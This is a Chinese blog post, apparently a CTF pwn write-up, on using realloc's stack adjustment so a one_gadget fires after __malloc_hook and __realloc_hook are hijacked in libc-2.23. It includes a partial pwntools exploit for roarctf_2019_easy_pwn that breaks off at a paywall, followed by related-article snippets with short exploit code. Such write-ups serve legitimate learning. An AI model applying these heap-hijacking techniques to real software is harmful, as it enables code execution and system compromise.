利用realloc调整栈使one_gadget生效

最新推荐文章于 2025-10-12 13:39:17 发布
原创 最新推荐文章于 2025-10-12 13:39:17 发布 · 855 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

本文详细讲述了在堆栈保护开启时,如何通过覆盖realloc函数来调整栈帧,以便于利用one_gadget漏洞。作者以64位libc-2.23.so为例,介绍了one_gadget的生效条件和realloc函数的利用策略,重点讲解了roarctf_2019_easy_pwn和vn_pwn_simpleHeap两个案例的攻破方法。

前言

当堆题保护全开的时候。PIE保护几乎使得unlink失效(除非能够计算出程序基址),FULL RELEO也使得函数GOT表不可修改。此时常覆盖各种函数的hook为one_gadget来getshell。

我常考虑的顺序是:

free_hook->malloc_hook->IO_FILE->exit_hook

若有沙盒限制,则考虑setcontext

free_hook不可打时(例如Fastbin Attack时free_hook前不能构造字节错位),我们往往就会打malloc_hook。此篇文章基于将malloc_hook覆盖为one_gadget,且one_gadget全失效的情况,如何用realloc的小trick调整栈,使得one_gadget可执行。

one_gadget成功条件

以64位libc-2.23.so为例,各个one_gadget生效的条件如下:

1

如图,0x4526a的one_gadget生效条件为:[rsp+0x30]==NULL。

要使该one_gadget生效,只需让rsp+0x30位置处数据为NULL即可。

realloc函数分析

realloc函数与malloc,free等函数执行流程一致,

均为:检查其对应hook是否为NULL,若不为NULL,则调用相应hook。

不同的是,realloc函数相较于malloc与free,多了很多push和sub操作,我们可以通过这个来达到调整栈的目的。

以64位libc-2.23.so为例,将libc-2.23.so拖进IDA,找到realloc函数:

2

因此我们可以用realloc_addr+offset的方式来调整栈,offset可取0,2,4,6,12,13。依次减少了push的次数。push指令会减小rsp的值,减少push指令个数相当于抬高栈,有利于满足rsp+0x30==NULL。

利用过程

realloc_hook覆盖为one_gadget,然后将malloc_hook覆盖为realloc_addr+offset

这样劫持后的实际运行顺序:

malloc -> malloc_hook -> realloc -> realloc_hook -> onegadget

例题

roarctf_2019_easy_pwn

程序分析

  • 保护全开
  • edit函数中:若满足输入长度等于申请堆块大小+10,则有一个off by one漏洞
  • free_hook可打,可以构造字节错位,但是不知道为什么莫名其妙会报错。

pwn

很简单的一道题,具体流程:

  • off by one 构造 chunk extend
  • 在大堆块中构建一个fake_chunk,free掉这个fake_chunk(大小得能落入unsortedbin),通过show大堆块,泄露libc基址
  • 通过Fastbin Double Free和Arbitrary Alloc打malloc_hook

关于offset的选择

可以调试,不过具体调试起来,并不是少一个push,就达到[rsp+0x20]=[rsp+0x28]的效果,少部分的某些地址可能还是会被写入其他值,因此一个一个试比较快/doge。

exp

from pwn import *

context.log_level = 'debug'
r = process('/mnt/hgfs/ubuntu/BUUCTF/roarctf_2019_easy_pwn')
elf =  ELF('/mnt/hgfs/ubuntu/BUUCTF/roarctf_2019_easy_pwn')
libc = ELF('/mnt/hgfs/ubuntu/BUUCTF/libc-2.23-64.so')

def new(size):
    r.recvuntil(b"choice: ")
    r.sendline(b'1')
    r.recvuntil(b"size: ")
    r.sendline(str(size))

def edit(id,size,content):
    r.recvuntil(b"choice: ")
    r.sendline(b'2')
    r.recvuntil(b"index: ")
    r.sendline(str(id))
    r.recvuntil(b"size: ")
    r.sendline(str(size))
    r.recvuntil(b"content: ")
    r.sendline(content)

def delete(id):
    r.recvuntil(b"choice: ")
    r.sendline(b'3')
    r.recvuntil(b"index: ")
    r.sendline(str(id))

def show(id):
    r.recvuntil
最低0.47元/天 解锁文章
linux面试题大全及参考答案(3万字长文)
大模型大数据攻城狮的专栏
06-25 1447
inode(索引节点)是Linux文件系统中的一个重要概念,它是文件系统用于存储元数据(文件属性信息)的一种数据结构。每个文件或目录在文件系统中都有且仅有一个inode与之对应,存储了除文件名和实际数据块之外的所有信息,包括文件的大小、权限、所有者、创建时间、修改时间、访问时间、链接数等。inode的角色唯一标识:每个inode都有一个唯一的数字编号,称为inode号码,是文件在文件系统中的真实身份标识。元数据存储:保存了文件的元数据信息,这些信息对于操作系统管理和定位文件至关重要。数据块索引。
realloc调整
ULGANOY的博客
07-09 586
关于realloc调整帧学习的简单记录。
关于利用realloc函数调整使onegadget可执行。
qq_39869547的博客
03-01 1314
此贴主要讲述: free_hook无法劫持,劫持__malloc_hook填onegadget全部失效的情况。我们利用realloc函数调整的位置,使得onegadget可执行。 直接上题了。buuoj上面的一个题。 保护全开。 漏洞点在于edit函数的溢出 常规思路,修改size,利用chunk overlap打free_hook,或者malloc_hook即可。 但是free_hook打...
072_二进制安全终极技术:一键RCE(One-Gadget)深度解析与实战指南——从Libc泄露到远程命令执行的高效攻击路径
欢迎来到智能安全前线!这里是AI与信息安全交汇之地。我们以代码为武器,深入大模型攻防实战,破解系统漏洞。追踪OpenAI、Meta前沿动态,用红蓝对抗思维,锻造智能时代的坚盾与利矛。
10-12 985
在二进制安全领域,实现远程命令执行(Remote Command Execution,RCE)是攻击的终极目标之一。传统的RCE实现通常需要构造复杂的ROP链,这不仅耗时而且容易出错。然而,"一键RCE"技术的出现彻底改变了这一局面。一键RCE,也就是通常所说的One-Gadget攻击,通过直接跳转到Libc库中预存的shellcode片段,实现单步命令执行,极大简化了攻击过程。
[pwn]堆:realloc_hook控制结构达成onegadget
热门推荐
Breeze的博客
12-31 1万+
[pwn]realloc_hook控制结构达成onegadget 文章目录[pwn]realloc_hook控制结构达成onegadgetchunk extend通过realloc调整帧来满足onegadgeteasy_pwn wp chunk extend chunk extend是一种限制比较少的堆利用方式,通常通过off by one或off by null来利用。 chuank ex...
通过 realloc_hook 调整帧使 onegadget 生效
蚁景网安学院
10-12 1700
亲爱的,关注我吧10/12文章共计3190个词预计阅读10分钟来和我一起阅读吧在某些堆的题目当中,由于限制只能使用 house of spirit 等方法劫持 malloc_hook ,...
one_gadget使用
Jingged的博客
04-09 1605
one_gadget是一个在二进制分析(尤其是利用分析)中常用的工具,它用于查找在给定二进制文件中可能存在的 "one-gadget" RCE(Remote Code Execution,远程代码执行)利用点。这些 "one-gadget" 通常指的是单个系统调用,当被正确利用时,能够直接赋予攻击者远程代码执行的能力,而无需链式利用多个漏洞。以下是使用one_gadget
[BJDCTF 2nd]one_gadget
weixin_45948183的博客
03-31 736
到ida看一下伪代码 函数输出了printf的地址,给了libc,利用one_gadget就可以的到libc的基址 这里需要自己试一下,这里是最后一个gadget from pwn import * p=remote('node3.buuoj.cn',25100) elf=ELF('./one_gadget') context.log_level='debug' libc = ELF('./l...
Pwn-gyctf_2020_force
fayinq的博客
03-13 494
gyctf_2020_force 这个题目是一个新的知识点,house_of_force,第一次看,以前没见过。 HOUSE_OF_FORCE: 使用条件: 能够使用溢出等手段,修改top_chunk的大小 能够自由分配chunk大小,不会被限制 基本原理: 在malloc之中,会有一个topchunk的size大小,如果说,能够malloc一个chunk的大小大于topchunk的大小(一般是0x20df1这种个大小),那么chunk就会去到vmmap映射出来的另一端地址,一般来说会在libc上面一点
BUUCTF [V&N2020 公开赛]simpleHeap
BengDouLove的博客
04-17 1269
保护机制全开的程序,也无法利用got表,,只能覆盖 malloc_hook 或者 free_hook 堆的题要好好分析代码 T T 1.add sub_AB2 是到heap_got (储存堆指针的表)里面找第一个空着的堆序号返回给v1,没有可用的就返回-1,最多申请10个堆 之后输入堆的大小,最大是 111,也就是0x6F,,加上chunk头是0x7F ,也就是申请的堆只能fastbin...
BJDCTF_ one_gadget
weixin_44864859的博客
04-09 422
考察点:one_gadget 题目给出了 printf 的地址,由此可算得 libc 基址,然后找 one_gadget、计算 libc 中 one_gadget 地址 printf("Give me your one gadget:"); __isoc99_scanf("%ld", &v4); v5 = v4; v4(); v4 是个函数指针,scanf 的时候把 on...
one_gadget:在libc.so.6中找到一个小工具RCE的最佳工具
02-05
小工具 在进行ctf pwn挑战时,我们通常需要一个小工具RCE(远程代码执行),这会导致调用execve('/bin/sh', NULL, NULL) 。 这个宝石提供了这种小工具查找器,无需像傻瓜一样每次都使用objdump或IDA-pro :winking_face: 要使用此工具,请在命令行中键入one_gadget /path/to/libc并享受其中的魔力 :grinning_squinting_face: 安装 在RubyGems.org上可用! $ gem install one_gadget 注意:需要ruby版本> = 2.1.0,可以使用ruby --version进行检查。 支持的架构 i386 amd64(x86-64) a
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 1万+
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
one_gadget不能搜索libc2.31及以上版本解决
qq_39153421的博客
04-14 1039
更新ruby 首先卸载已有的ruby、onegadget: sudo gem uninstall one_gadget sudo apt remove gem ruby 下载ruby-install安装,由他来安装或升级ruby wget -O ruby-install-0.8.1.tar.gz https://github.com/postmodern/ruby-install/archive/v0.8.1.tar.gz tar -xzvf ruby-install-0.8.1.tar.gz cd ru
one_gadget的安装与使用
weixin_62675330的博客
03-04 4780
0x0 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 没有ROP_gadget的赶快了。 ROP_gadget 下载安装与使用 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 one_gadget 是libc中存在的一些执行execve(“bin/sh",NULL,NULL)的片段。当我们知道libc的版本,并且通过信息泄露得到libc的基址,就可以通过控制EIP/RIP( 覆盖.go
one_gadget用法|攻防世界pwn进阶区babystack
Kni9hT's Blog
03-25 8944
文章目录0x00.检查保护 0x00.检查保护 devil@ubuntu:~/adworld/pwn$ checksec babystack [*] '/home/devil/adworld/pwn/babystack' Arch: amd64-64-little RELRO: Full RELRO ;无法修改got表 Stack: Canary fou...
one_gadget 工具安装与使用教程
gitblog_00415的博客
08-13 1179
`one_gadget` 是一个用于查找libc中的单个指令序列(也称为rop gadget)的工具,这些指令可以模拟特定功能,例如执行`/bin/sh`。该项目的目录结构如下: ``` . ├── bin # 包含可执行文件 ├── lib # 库文件和其他支持文件 ├── test # 测试案例 └── src #...
ubuntu16.04 编译安装ruby环境、onegadget
Tw0的博客
01-24 1402
ubuntu16.04 安装one_gadget
关于one_gadget利用,为什么改__malloc_hook为__realloc_hook,改__realloc_hook为one_gadget
has_zaoganmaqule的博客
07-19 571
看了眼wp,很奇怪不知道为什么要改__malloc_hook为__realloc_hook,改__realloc_hook为one_gadget?我记得我之前看b站roderickchan✌的视频的时候,提到了one_gadget利用问题,他说有时候可能你程序当时的堆不满足条件,但是没关系可以在one_gadget附件找一找也可能getshell。的一段非常有用的gadget。在我们能控制程序执行流的时候,直接执行到onegadget的地址,并且满足onegadget的条件,便可直接getshell。
realloc(array, new_capacity * sizeof(int));
最新发布
11-20
总结:`realloc(array, new_capacity * sizeof(int))`的作用是将指针`array`指向的内存块大小调整为`new_capacity * sizeof(int)`字节,并返回调整后的内存地址。使用时要小心处理返回值,避免内存泄漏和悬空指针。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值